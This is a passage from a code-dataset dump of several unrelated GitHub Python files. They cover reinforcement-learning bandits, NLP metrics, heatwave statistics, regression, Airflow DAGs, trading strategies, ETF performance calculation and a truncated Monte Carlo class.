type(y_test)\n a=test_data['y']\n return f1_score(a, y_pred_bool,average='micro')\n","repo_name":"tusharjoshi03/Image-Classification-Using-Convolutional-Neural-Network","sub_path":"svhn.py","file_name":"svhn.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"43892236423","text":"import numpy as np\nfrom random import randint\nfrom numpy.random import choice\nimport matplotlib.pyplot as plt\nimport random\nimport sys\n\nclass Softmax():\n\tdef __init__(self):\n\t\tself.reward_gaussians()\n\n# Initialising the gaussian reward distributions with given mean values and calls the iterator\n\n\tdef reward_gaussians(self):\n\t\tself.arms=[]\n\t\tmeans=[0.2,-0.8,1.55,0.4,1.2,-1.5,-0.1,-1.0,0.8,-0.5]\n\t\tfor i in range(10):\n\t\t\tself.arms.append(np.random.normal(means[i],1,10000))\n\n#Temperature initialisation\n\n\t\ttemp=[0.01,0.1,1]\n\t\tfor count,i in enumerate(temp):\n\t\t\tself.trials(i,count)\n\n# Plotting Section\n\n\t\tplt.ylabel('Average Reward')\n\t\tplt.legend(loc='upper right')\n\t\tplt.xlabel('Steps')\n\t\tplt.title('Softmax')\n\t\tplt.show()\n\n# Softmax Implementation \n\n\tdef softmax(self,Q,Temp):\n\t\tProbability=[]\n\t\tsum=0\n\t\tfor j in range(10):\n\t\t\tsum=sum+np.exp(Q[j]/Temp)\n\t\tfor i in range(10):\n\t\t\tProbability.append(np.exp(Q[i]/Temp)/sum)\n\t\treturn Probability\n\n\n\tdef trials(self,T,counts):\n\t\treward=[0 for i in range(1000)]\n\t\tarms=[i for i in range(10)]\n\n# Loop for averaging over 2000 Bandit Problems\n\n\t\tfor outer in range(2000):\n\t\t\tQ=[0 for i in range(10)]\n\t\t\tcount=[0 for i in range(10)]\n\n# Implemetation of 1000 steps\n\n\t\t\tfor inner in range(1000):\t\t\n\t\t\t\tProbability=self.softmax(Q,T)\n\t\t\t\tmaxvalueE=choice(arms,p=Probability)\n\t\t\t\tcount[maxvalueE]=count[maxvalueE]+1\n\t\t\t\tReturn=self.arms[maxvalueE][randint(0,9999)]\n\t\t\t\tQ[maxvalueE]=Q[maxvalueE]+(Return-Q[maxvalueE])/count[maxvalueE]\n\t\t\t\treward[inner]=reward[inner]+Return\n\t\treward=np.array(reward)\n\n# Taking the average reward from 2000 runs\n\t\t\n\t\treward=reward/2000\n\t\tcolor=['r','g','b']\n\t\tlabel=\"Temp=\"+str(T)\n\t\tplt.plot(reward,color[counts],label=str(label))\n\n\t\t\nif __name__=='__main__':\n\tobj=Softmax()","repo_name":"nivedn3/RL_Assignments","sub_path":"PA1/Softmax.py","file_name":"Softmax.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20413136218","text":"#!/usr/bin/env python3\n\"\"\"\nmodule for task 0\n\"\"\"\n\nimport numpy as np\n\n\ndef uni_bleu(references, sentence):\n \"\"\"\n calculates unigram BLEU score for sentence\n \"\"\"\n sentence_length = len(sentence)\n references_length = []\n words = {}\n for translation in references:\n references_length.append(len(translation))\n for word in translation:\n if word in sentence and word not in words.keys():\n words[word] = 1\n total = sum(words.values())\n index = np.argmin([abs(len(i) - sentence_length) for i in references])\n BLEU = np.exp(1 - float(len(references[index])) / float(sentence_length))\n if sentence_length > len(references[index]):\n BLEU = 1\n return BLEU * np.exp(np.log(total / sentence_length))\n","repo_name":"not-notAlex/holbertonschool-machine_learning","sub_path":"supervised_learning/0x10-nlp_metrics/0-uni_bleu.py","file_name":"0-uni_bleu.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70772515047","text":"import retro\n\nmovie = retro.Movie('SonicTheHedgehog-Genesis-GreenHillZone.Act1-0000.bk2')\nmovie.step()\n\nenv = retro.make(game=movie.get_game(), state=retro.STATE_NONE, use_restricted_actions=retro.ACTIONS_ALL)\nenv.initial_state = movie.get_state()\nenv.reset()\n\nwhile movie.step():\n keys = []\n for i in range(env.NUM_BUTTONS):\n keys.append(movie.get_key(i))\n _obs, _rew, _done, _info = env.step(keys)\n env.render()\n","repo_name":"bijanpuri/ml","sub_path":"retro/playback.py","file_name":"playback.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71513230248","text":"\"\"\"\nSource vertices generator\n\"\"\"\n\nimport random\nfrom typing import List, Union\n\nimport networkx as nx\n\n\ndef select_number_source_verts(num_nodes, n: int, seed: Union[int, None] = None) -> List:\n \"\"\"Return a list of random source vertices in the amount of n\n\n Parameters\n ----------\n graph :\n Initial graph.\n\n n : int\n The number of nodes.\n \n seed : integer, random_state, or None (default)\n Indicator of random number generation state.\n\n Returns\n -------\n l : List\n A random list of nodes in a graph.\n \"\"\" \n if n > num_nodes:\n n = num_nodes\n # raise ValueError(f\"{n} exceeds the number of nodes in a graph ({num_nodes})\")\n \n random.seed(seed)\n\n return random.sample([x for x in range(num_nodes)], n)\n \ndef select_percent_source_verts(num_nodes, p: int, seed: Union[int, None] = None) -> List:\n \"\"\"Return a list of random source vertices in the amount of percent p\n\n Parameters\n ----------\n graph :\n Initial graph.\n\n p : int\n The percent of nodes.\n \n seed : integer, random_state, or None (default)\n Indicator of random number generation state.\n\n Returns\n -------\n l : List\n A random list of nodes in a graph.\n \"\"\"\n return select_number_source_verts(num_nodes, int(num_nodes * p / 100.0), seed)\n\ndef generate_single_source(\n graph\n ) -> List[int]:\n \"\"\"Returns a set of vertices for single-source evaluation for the given graph.\n The size of generated set is dependant on the number of nodes in the graph.\n For \n Parameters\n ----------\n graph :\n Graph for which the sample is generated.\n Returns\n -------\n nodes: List[int]\n The list of sampled node indices for which to evaluate single-source CFPQ.\n \"\"\"\n nodes = graph.num_nodes\n sources = []\n noderange = int(0)\n if nodes < 10000:\n noderange = nodes\n elif nodes < 100000:\n noderange = nodes // 10\n else:\n noderange = nodes // 100\n\n for i in range(noderange):\n sources.append(random.randrange(0, nodes))\n\n return sources","repo_name":"bahbyega/paths-benchmark","sub_path":"scripts/gen_chunks.py","file_name":"gen_chunks.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15723223544","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 5 13:21:43 2022\n\n@author: Pablo G. Zaninelli\n\"\"\"\n\nfrom netCDF4 import Dataset, num2date\nimport pandas as pd\nfrom multiprocessing import Pool\nfrom functools import partial\nimport numpy as np\nfrom HWCompute.preprocess import daymax, daymin, tranCelcius, convertLon, coorobj\nfrom HWCompute.compute_percentile import dayPerc, checkAllNAN, checkAnyNAN\nfrom HWCompute.lib.Heatwave import hwstat\n\n\ndef hw1d(df, q, window, umbral, yStartP, yEndP, lon, lat):\n assert isinstance(df, pd.core.frame.DataFrame)\n _reqCol = ['doy', 'temp']\n colnames = [ii for ii in df.keys()]\n colnames.sort()\n if not colnames == _reqCol:\n raise AttributeError(\"df must have 'doy' and 'temp' columns\")\n if not np.ma.is_masked(df.temp) and not checkAllNAN(df.temp):\n perc = dayPerc(df, q, window, yStartP, yEndP)\n if checkAnyNAN(df.temp):\n df = df.dropna() # remove NaN values if they exist\n mat = df.to_numpy()\n inds, indf, acc, mmean, maxi, mini, max_ex, sum_ex = hwstat(mat,perc, umbral)\n if not inds.size == 0:\n tBeginHW, tEndHW = df.index[inds], df.index[indf]\n DF = pd.DataFrame({'longitude':[float(lon)]*acc.shape[0],\n 'latitude':[float(lat)]*acc.shape[0],\n 'start':tBeginHW,\n 'end':tEndHW,\n 'accumulated':acc,\n 'mean':mmean,\n 'maxtemp':maxi,\n 'mintemp':mini,\n 'max_ex':max_ex,\n 'sum_ex':sum_ex})\n else:\n DF = pd.DataFrame({'longitude':float(lon),\n 'latitude':float(lat),\n 'start':np.nan,\n 'end':np.nan,\n 'accumulated':np.nan,\n 'mean':np.nan,\n 'maxtemp':np.nan,\n 'mintemp':np.nan,\n 'max_ex':np.nan,\n 'sum_ex':np.nan},\n index=[0])\n else:\n DF = pd.DataFrame({'longitude':float(lon),\n 'latitude':float(lat),\n 'start':np.nan,\n 'end':np.nan,\n 'accumulated':np.nan,\n 'mean':np.nan,\n 'maxtemp':np.nan,\n 'mintemp':np.nan,\n 'max_ex':np.nan,\n 'sum_ex':np.nan},\n index=[0]) \n return DF\n\ndef loadDF(ncFile, main_var, time_var, ilon, ilat, tmax, daily, kelvin):\n nc = Dataset(ncFile)\n time = nc.variables[time_var]\n df = pd.DataFrame({'date':pd.to_datetime([str(x) for x in num2date(time[:], \n time.units)]),\n 'temp':nc.variables[main_var][:,ilat,ilon]})\n nc.close()\n df['doy'] = df.date.dt.dayofyear\n if not daily or not np.ma.is_masked(df.temp):\n if tmax:\n df = daymax(df)\n else:\n df = daymin(df)\n if kelvin and not np.ma.is_masked(df.temp):\n df = tranCelcius(df) # convert to celsius degree\n return df\n\ndef func_mp(ncFile, main_var, time_var, tmax, daily, kelvin, q, window, umbral, \n yStartP, yEndP, lon, lat, ilat, ilon):\n lon0, lat0 = lon[ilon], lat[ilat]\n print(f\"latitude: {lat0}, longitude: {lon0}\")\n df = loadDF(ncFile, main_var, time_var, ilon, ilat, tmax, daily, kelvin)\n result = hw1d(df, q, window, umbral, yStartP, yEndP, lon0, lat0)\n return result\n\ndef hwbpointNC(ncFile, main_var, time_var, lon_var, lat_var, tmax = True,\n daily = False,\n kelvin = True,\n filemask = None,\n mNCVarName = None,\n mNCLonName = None,\n mNCLatName = None,\n trim_lon = None,\n trim_lat = None,\n ncpu = None,\n **args):\n if not args:\n raise AttributeError(\"Parameters to compute HW are not defined!\")\n if ncpu is None:\n raise AttributeError(\"The number of CPUs to be used must be provided\")\n nc = Dataset(ncFile)\n lon = nc.variables[lon_var][:]\n lon = convertLon(lon)\n lat = nc.variables[lat_var][:]\n nc.close()\n coord = coorobj(lon, lat, trim_lat=trim_lat, trim_lon = trim_lon)\n ilat, ilon = coord.getInd(filemask=filemask,\n mNCVarName = mNCVarName,\n mNCLonName = mNCLonName,\n mNCLatName = mNCLatName)\n func_mp_p = partial(func_mp, ncFile, main_var, time_var,tmax, daily, kelvin,\n args[\"q\"], \n args[\"window\"], \n args[\"umbral\"], \n args[\"yStartP\"], \n args[\"yEndP\"],\n lon, lat)\n pool = Pool(ncpu)\n dfs = pool.starmap(func_mp_p, zip(ilat,ilon))\n pool.close()\n pool.join()\n hwDF = pd.concat(dfs,ignore_index=True)\n return hwDF\n \n\nif __name__ == \"__main__\": \n filename = \"/home/pzaninelli/TRABAJO/IGEO/comparacion/2m_temperature_6h_era_5_1950-2021_2_5.nc\"\n hwdf = hwbpointNC(filename, main_var =\"t2m\", time_var = \"time\",\n lon_var = \"longitude\", lat_var = \"latitude\", tmax = False,\n daily = False, kelvin = True,\n filemask=\"/home/pzaninelli/TRABAJO/IGEO/comparacion/land_sea_mask_6h_era_5_01011979-31121979_2_5.nc\",\n mNCVarName=\"lsm\", mNCLatName=\"latitude\", mNCLonName=\"longitude\",\n trim_lon = [-22,45], trim_lat = [27,72], ncpu = 10,\n q= 90,window = 15, umbral = 3, yStartP = 1950, yEndP = 1980)","repo_name":"pzaninelli/HWCompute","sub_path":"HWCompute/hw.py","file_name":"hw.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19882170613","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 27 23:16:11 2022\n\n@author: kundakci\n\"\"\"\n\n# Polynomial Linear Regression\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# Veri setimizi pandas yardımıyla alıp dataframe nesnemiz olan df 'in içine aktarıyoruz...\ndf = pd.read_csv('polynomial.csv', sep=';')\n\n# Bir adet polynomial regression nesnesi oluşturması için PolynomialFeatures fonksiyonunu çağırıyoruz...\n# Bu fonskiyonu çağırırken polinomun derecesini (N) belirtiyoruz:\npolynomial_regression = PolynomialFeatures(degree=5)\nx_polynomial = polynomial_regression.fit_transform(df[['deneyim']])\n\n\n# regression model nesnemizi olan reg nesnemizi oluşturup bunun fit metonu çağırarak x_polynomial ve y eksenlerini fit ediyor\n# yani regresyon modelimizi mevcut gerçek verilerle eğitiyoruz:\nreg = LinearRegression()\nreg.fit(x_polynomial, df['maas'])\n\n# model görselleştirme\ny_head = reg.predict(x_polynomial)\nplt.plot(df['deneyim'], y_head, color='red', label='polynomial regression')\nplt.legend()\nplt.scatter(df['deneyim'], df['maas'])\nplt.show()\n\n\nx_polynomial1 = polynomial_regression.fit_transform([[4.5]])\nreg = reg.predict(x_polynomial1)\n\n# #### Alacağı maaş çok güzel bir şekilde şirket politikasına fit etmiş oluyor hakkı yenmeden ! :)\n","repo_name":"kundakcii/artificial_intelligence_repo","sub_path":"polynomial_linear_regression/proje_1/proje_1.py","file_name":"proje_1.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36899336574","text":"import pyspark.sql.functions as f\nfrom pyspark.sql import DataFrame\nfrom pyspark.ml.linalg import (\n VectorUDT,\n DenseVector,\n)\n\n\ndef prepare(dataset: DataFrame, row_name: str, prepared_row_name: str) -> DataFrame:\n return dataset.filter(\n dataset[row_name].isNotNull()\n ).select(\n '*',\n f.split(\n f.col(row_name),\n ' '\n ).alias(\n prepared_row_name\n )\n )\n\n\ndef vector_to_column(vector: DenseVector):\n return f.udf(\n lambda: vector,\n VectorUDT()\n )()\n","repo_name":"NobodyOne04/unix_lab","sub_path":"core/ml_engine/app/engine/src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69929945447","text":"import pandas as pd\nimport numpy as np\nfrom . import trade\nimport json\nimport time\nimport csv\nfrom datetime import datetime\nimport datetime\n\nfrom . import rtdp, rtstr, utils, rtctrl\n\n# Reference: https://crypto-robot.com/blog/bollinger-trend\n# Reference: https://github.com/CryptoRobotFr/backtest_tools/blob/main/backtest/single_coin/bol_trend.ipynb\n\n\"\"\"\n===========================\nsl: 0 stochOverBought: 0.95 stochOverSold: 0.05 offset: 2\nnb pair: 34\nfinal_wallet mean: 39149.95676470589\nfinal_wallet max: 911640.2\nvs_hold_pct mean: 18.317647058823532\nvs_hold_pct max: 239.58\nglobal_win_rate mean: 0.695\nglobal_win_rate max: 0.83\ntotal_trades mean: 84.1470588235294\ntotal_trades max: 187.0\nlist pairs: ['XRP', 'BCH', 'DOGE', 'AAVE', 'ATOM', 'SUSHI', 'SHIB', 'EGLD', 'AR', 'PEOPLE', 'IOTA', 'ZIL', 'APE', 'STORJ', '1INCH', 'LUNA2', 'FLOW', 'REEF', 'LUNC', 'MINA', 'ASTR', 'ANKR', 'ACH', 'HBAR', 'CKB', 'RDNT', 'HFT', 'ZEC', 'FLOKI', 'SPELL', 'SUI', 'STMX', 'UMA', 'SLP']\n===========================\n\"\"\"\n\nclass StrategyEnvelopeStochRSI(rtstr.RealTimeStrategy):\n\n def __init__(self, params=None):\n super().__init__(params)\n\n self.rtctrl = rtctrl.rtctrl(params=params)\n self.rtctrl.set_list_open_position_type(self.get_lst_opening_type())\n self.rtctrl.set_list_close_position_type(self.get_lst_closing_type())\n\n # self.envelope = EnvelopeLevelStatus(self.lst_symbols)\n # self.nb_envelope = 3\n\n # self.stochOverBought = 0.95\n # self.stochOverSold = 0.05\n\n # self.stochOverBought = 0.8\n # self.stochOverSold = 0.2\n\n self.stochOverBought = 0.9\n self.stochOverSold = 0.1\n\n self.zero_print = True\n\n self.tmp_debug_traces = True\n self.strategy_info_printed = False\n\n def get_data_description(self):\n ds = rtdp.DataDescription()\n ds.symbols = self.lst_symbols\n ds.interval = self.strategy_interval\n ds.candle_stick = self.candle_stick\n\n ds.fdp_features = {\"close\": {},\n \"stoch_rsi\": {\"indicator\": \"stoch_rsi\", \"window_size\": 30,\n \"stoch_rsi_window_size\":14, \"output\": [\"stoch_rsi\", \"stoch_rsi_k\", \"stoch_rsi_d\"]},\n\n \"postprocess1\": {\"indicator\": \"shift\", \"window_size\": 1, \"n\": \"1\",\n \"input\": [\"stoch_rsi_k\"]},\n \"postprocess2\": {\"indicator\": \"shift\", \"window_size\": 2, \"n\": \"2\",\n \"input\": [\"stoch_rsi_k\"]},\n \"postprocess3\": {\"indicator\": \"shift\", \"window_size\": 3, \"n\": \"3\",\n \"input\": [\"stoch_rsi_k\"]},\n \"stoch_rsi_pred\": {\"indicator\": \"stoch_rsi_pred\", \"window_size\": 30, \"pred_window_size\": 5,\n \"stoch_rsi_window_size\": 14},\n\n \"stoch_rsi_trend\": {\"indicator\": \"stoch_rsi_trend\", \"window_size\": 30, \"pred_window_size\":5,\n \"stoch_rsi_window_size\": 14,\n \"output\": [\"stoch_rsi_trend\", \"stoch_rsi_k_trend\", \"stoch_rsi_d_trend\"]},\n\n \"willr\": {\"indicator\": \"willr\", \"window_size\": 14},\n \"willr_trend\": {\"indicator\": \"willr_trend\", \"pred_window_size\":5, \"window_size\": 14},\n\n \"ao\": {\"indicator\": \"ao\", \"ao_window_1\": 6, \"ao_window_2\": 22, \"window_size\": 22},\n \"ao_trend\": {\"indicator\": \"ao_trend\", \"ao_window_1\": 6, \"ao_window_2\": 22, \"pred_window_size\":5, \"window_size\": 22},\n\n \"envelope\": {\"indicator\": \"envelope\", \"window_size\": 10,\n \"ma\": \"sma\", \"ma_window_size\": 5,\n # \"ma_offset_1\": \"2\", \"ma_offset_2\": \"5\", \"ma_offset_3\": \"7\",\n # \"ma_offset_1\": \"3\", \"ma_offset_2\": \"5\", \"ma_offset_3\": \"7\",\n \"ma_offset_1\": \"2\", \"ma_offset_2\": \"3\", \"ma_offset_3\": \"5\",\n \"output\": [\"ma_base\",\n \"envelope_long_1\", \"envelope_long_2\", \"envelope_long_3\",\n \"envelope_short_1\", \"envelope_short_2\", \"envelope_short_3\"]\n }\n }\n\n ds.features = self.get_feature_from_fdp_features(ds.fdp_features)\n\n if not self.strategy_info_printed:\n print(\"startegy: \", self.get_info())\n print(\"strategy features: \", ds.features)\n self.strategy_info_printed = True\n\n # ['close', 'envelope', 'ma_base', 'envelope_long_1', 'envelope_long_2', 'envelope_long_3', 'envelope_short_1', 'envelope_short_2', 'envelope_short_3']\n return ds\n\n def get_info(self):\n return \"StrategyEnvelopeStochRSI\"\n\n def authorize_multi_transaction_for_symbols(self):\n # Multi buy is authorized for this strategy\n return False\n\n def condition_for_opening_long_position(self, symbol):\n if self.df_current_data['close'][symbol] > self.df_current_data['envelope_long_1'][symbol]:\n return False\n elif self.df_current_data['close'][symbol] < self.df_current_data['envelope_long_1'][symbol]\\\n and self.df_current_data['stoch_rsi'][symbol] < self.stochOverSold:\n return True\n\n def condition_for_opening_short_position(self, symbol):\n if self.df_current_data['close'][symbol] < self.df_current_data['envelope_short_1'][symbol]:\n return False\n elif self.df_current_data['close'][symbol] > self.df_current_data['envelope_short_1'][symbol] \\\n and self.df_current_data['stoch_rsi'][symbol] > self.stochOverBought:\n return True\n\n def condition_for_closing_long_position(self, symbol):\n if self.df_current_data['close'][symbol] >= self.df_current_data['ma_base'][symbol]:\n return True\n else:\n return False\n\n def condition_for_closing_short_position(self, symbol):\n if self.df_current_data['close'][symbol] <= self.df_current_data['ma_base'][symbol]:\n return True\n else:\n return False\n\n def sort_list_symbols(self, lst_symbols):\n print(\"symbol list: \", lst_symbols)\n df = pd.DataFrame(index=lst_symbols, columns=['ao'])\n for symbol in lst_symbols:\n df.at[symbol, 'ao'] = self.df_current_data['ao'][symbol]\n df.sort_values(by=['ao'], inplace=True, ascending=False)\n lst_symbols = df.index.to_list()\n print(\"sorted symbols with AO: \", lst_symbols)\n return lst_symbols","repo_name":"cedfactory/crag","sub_path":"src/rtstr_envelopestochrsi.py","file_name":"rtstr_envelopestochrsi.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28715425829","text":"def getdate():\n import datetime\n return datetime.datetime.now()\n\na=str(getdate())\nb = input(\"Enter something\")\n# c=a+b\n# print(c)\nwith open(\"nik.txt\",\"a+\") as f:\n # a=str(getdate())\n # b = input(\"Enter something\")\n f.write(\"\\n\"+a+\"\\t\"+b)\n #f.write(b)\n a1=f.read()\n print(a1)\n#\n# xx = str(getdate())\n# print(xx)\n# print(type(xx))\n# print(getdate())\n# print(type(getdate()))","repo_name":"jhanikhil19/100-days-of-code","sub_path":"rough.py","file_name":"rough.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40081856739","text":"from datetime import datetime, date\nfrom airflow import DAG\nfrom airflow.operators.python_operator import BranchPythonOperator, PythonOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators import BashOperator\n\n\ndag = DAG('test_2',\n description='Test 2',\n catchup=False,\n schedule_interval= None,\n start_date=datetime(2020, 8, 1))\n\ndef python1():\n\treturn 2;\n\ndummy1 = PythonOperator(\n task_id='starting_task',\n python_callable=python1,\n dag=dag\n)\n\ndummy2 = BashOperator(\n task_id='branch1',\n bash_command=\"echo 3\",\n dag=dag\n)\n\ndummy3 = BashOperator(\n task_id='branch2',\n bash_command=\"sleep 50\",\n dag=dag\n)\n\ndummy4 = BashOperator(\n task_id='join_1',\n bash_command=\"echo 2\",\n dag=dag\n)\n\ndummy5 = BashOperator(\n task_id='join_2',\n bash_command=\"echo 3\",\n dag=dag\n)\n\ndummy1 >> [dummy2, dummy3] >> dummy4 >> dummy5","repo_name":"abhinavkrdeeps/airflow","sub_path":"dags/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9667447016","text":"import datetime as dt\nimport sqlite3 as db\nimport argparse\nfrom dateutil.relativedelta import relativedelta\nimport sys\nimport pandas as pd\nfrom calendar import isleap\nfrom tabulate import tabulate\nimport numpy as np\nimport math as mt\n\n# sumColumn\n#\n# input:\n# m, the input table\n# column, the index of the column values to sum\n# output:\n# the sum of the values in the input column\n# description:\n# This function calculates the sum of the values in the\n# input column of the table m.\ndef sumColumn(m, column):\n total = 0\n for row in range(len(m)):\n total += m[row][column]\n return total\n\n####################################################################################################\n# Main\n####################################################################################################\n# Parse the input values\nparser = argparse.ArgumentParser()\nparser.add_argument(\"ticker\", nargs='+', help=\"Specify the ETF ticker\")\nparser.add_argument(\"-s\", \"--startdate\", type=lambda d: dt.datetime.strptime(d, '%Y-%m-%d'), help=\"Specify start date for backtest period (YYYY-mm-dd)\")\nparser.add_argument(\"-e\", \"--enddate\", type=lambda d: dt.datetime.strptime(d, '%Y-%m-%d'), help=\"Specify end date for backtest period (YYYY-mm-dd)\")\nargs=parser.parse_args()\n\n# If no start date is specified we assume 1970/1/1\nif args.startdate == None:\n args.startdate=dt.datetime(1970, 1, 1)\n\n# If no end date is specified we assume now.\nif args.enddate == None:\n args.enddate=dt.datetime.now()\n\n# Prepare the Performance Table that will contain, for the input ETF:\n# - Cimulative Return\n# - Annual Return\n# - Volatility \noutput_report = [[\"\"], [\"Start date\"], [\"End date\"], [\"\"], [\"Cum. return\"], [\"Ann. return\"], [\"Ann. volatility\"]]\nheaders=['Backtest']\n\n# Calculate the performance for each input ETF\nfor ticker in args.ticker:\n output_report_row = []\n headers.append(ticker)\n\n # Retrieve quotation for the ETF in the specified period\n try:\n cnx = db.connect('database/etfs.db')\n cur = cnx.cursor()\n cur.execute('SELECT Date, Close FROM quotes WHERE Ticker=\"' + ticker + '\" and Date >= \"' + args.startdate.strftime('%Y-%m-%d') + '\" and Date <= \"' + args.enddate.strftime('%Y-%m-%d') + '\"')\n all_quotes = cur.fetchall()\n except Exception as e:\n print('Failed to load quotes from database:')\n print(e)\n finally:\n cnx.close()\n\n # If, for the selected period, there is no quote exit immediately\n if len(all_quotes)==0:\n print(\"No quotes available for the period specified.\")\n sys.exit(0)\n\n # Retrieve dividends for the ETF if any\n try:\n cnx = db.connect('database/etfs.db')\n cur = cnx.cursor()\n cur.execute('SELECT Date, Dividend FROM dividends WHERE Ticker=\"' + ticker + '\" and Date >= \"' + args.startdate.strftime('%Y-%m-%d') + '\" and Date <= \"' + args.enddate.strftime('%Y-%m-%d') + '\"')\n all_dividends = cur.fetchall()\n except Exception as e:\n print('Failed to load dividends from database:')\n print(e)\n finally:\n cnx.close()\n\n start_date=dt.datetime.strptime(all_quotes[0][0], '%Y-%m-%d')\n end_date=dt.datetime.strptime(all_quotes[len(all_quotes)-1][0], '%Y-%m-%d')\n # Calculate the start price and end price of the selected period\n start_price=all_quotes[0][1]\n end_price=all_quotes[len(all_quotes)-1][1]\n\n # Calculate the sum of all the dividends in the selected period\n total_dividend=0\n if len(all_dividends)!=0:\n total_dividend=sumColumn(all_dividends, 1)\n\n # Cumulative Return\n # -----------------\n # Cumulative return is the percentage of total earning from start to finish\n # of the investment. For example, if you invested 1000$ on September 10th\n # 2007 and you sold everything in February 10th 2011 at a prince of 1300$\n # 1300$ you had a cumulative return of 30%.\n #\n # The formula to calculate the cumulative return is:\n # (end price/start price) -1\n # If you want the percentage number multiply the result for 100.\n cum_return_percentage=(((end_price+total_dividend)/start_price) - 1)*100\n\n # Annual Return (or CAGR)\n # -----------------------\n # The Cumulative Return is a good measure to know the total return of an\n # investement and to compare two investments if they occurred on the same\n # period of time. A better measure of return is the Annual Return (or CAGR)\n # because it calculate the return of the investment over a long period of\n # times (usually years) annually.\n # Suppose you have 100$ invested over 4 years and at the end of 4th year\n # sold everything at 146.41$.you\n #\n # Initial capital: 100$\n # 2007: 110.00$ -> 10% earning\n # 2008: 121.00$ -> 10% earning\n # 2008: 133.10$ -> 10% earning\n # 2009: 146.41$ -> 10% earning\n #\n # Your Cumulative earning was 46.41$ for a Cumulative Return of 46.41%.\n # Now if you try to divide the cumulative return by 4 you get:\n #\n # Cumulative Return/4=11.60%\n #\n # As you can see this is not a measure of the Annual Return because it\n # does not take in consideration the compound interest. In fact, this\n # formula measure the so called Average Annual Return.\n #\n # Average Annual Return=Cumulative Return/N\n #\n # where N is the number of years. In a time series where start date is not\n # exactly January 1st and end date exactly the December 31th you should\n # count the number of years plus the additional days. For example, in a\n # date frame of Semptember 10th 2007 to February 10th 2011 we have 3 years\n # and 122 days.\n # 122 days=122/365=0.33 years so N=3.33 years.\n #\n # The formula to calculate the Annual Return is:\n # Annual Return=(Final Capital/Initial Capital)^(1/N)-1\n #\n # Let's apply the formula to the above example.\n #\n # Annual Return=(146.41/100)^(1/4)-1=0,10\n #\n # Multiplying this value for 100 we get the original 10% growth rate you\n # observed at the beginning of the example. Also for this formula are valid\n # the considerations about N when we have a date frame that is not perfectly\n # a multiple of one year.\n\n # Since we already have the start and end price, to calculate the annual\n # return we need only to calculate N\n diffyears=end_date.year - start_date.year\n difference=end_date - start_date.replace(end_date.year)\n days_in_year=isleap(end_date.year) and 366 or 365\n number_years=diffyears + difference.days/days_in_year\n annual_return=(pow(((end_price+total_dividend)/start_price),(1/number_years))-1)*100\n\n # Annual Volatity\n # ---------------\n # We are going to use Annual Volatility as a measure of risk. Suppose to\n # have a price series:\n #\n # prices=(110.68, 111.559998, 109.879997, 109.099998,...,279.57)\n #\n # for each day d calculate the percentage change from previous day (d-1).\n #\n # Change %=Price(d)-Price(d-1)/Price(d-1)*100\n #\n # Luckly Python as a function that allow to calculate the percentage change\n # on a series. In our example:\n #\n # prices change %=(n/a, 0.007951, -0.015059, -0.007099,..., -0.010161)\n prices=list(zip(*all_quotes))[1]\n df = pd.DataFrame({'Close':list(prices)})\n annual_volatility=np.std(df['Close'].pct_change()*100)*mt.sqrt(252)\n\n output_report[1].append(dt.datetime.strftime(start_date, '%Y-%m-%d'))\n output_report[2].append(dt.datetime.strftime(end_date, '%Y-%m-%d'))\n output_report[4].append(\"%.2f %%\" % cum_return_percentage)\n output_report[5].append(\"%.2f %%\" % annual_return)\n output_report[6].append(\"%.2f %%\" % annual_volatility)\nprint(\"\")\nprint(tabulate(output_report,headers,tablefmt='orgtbl'))\n","repo_name":"sasadangelo/finance","sub_path":"perf.py","file_name":"perf.py","file_ext":"py","file_size_in_byte":7727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27330855997","text":"import numpy as np\n\nclass FVMC(object):\n States = []\n for s in range(12, 22):\n for d in range(1, 11):\n for a in range(2):\n state = ''\n if d == 1:\n state += 'A'\n else:\n state += str(d)\n \n state += ' ' + str(s) + ' ' + str(a)\n States.append(state)\n K = len(States)\n\n def __init__(self):\n # The default policy to be evaluated is sticking only on 20 or 21\n self.policy = ['hit' for i in range(self.K)]\n self.policy[-40:] = ['stick' for i in range(40)]\n\n self.V = np.zeros(self.K)\n self.Returns = [[] for s in range(self.K)]\n\n def update_values(self, episode_states, episode_rewards):\n \"\"\" Update the V(s) values after an episode finishes \"\"\"\n for s in set(episode_states):\n i = episode_states.index(s) # index of the first visit of state s\n R = sum(episode_rewards[i:]) # total return starting from first visit of s\n self.Returns[s].append(R)\n self.V[s] = np.mean(self.Returns[s])\n\n def train(self, env, total_episodes):\n \"\"\" 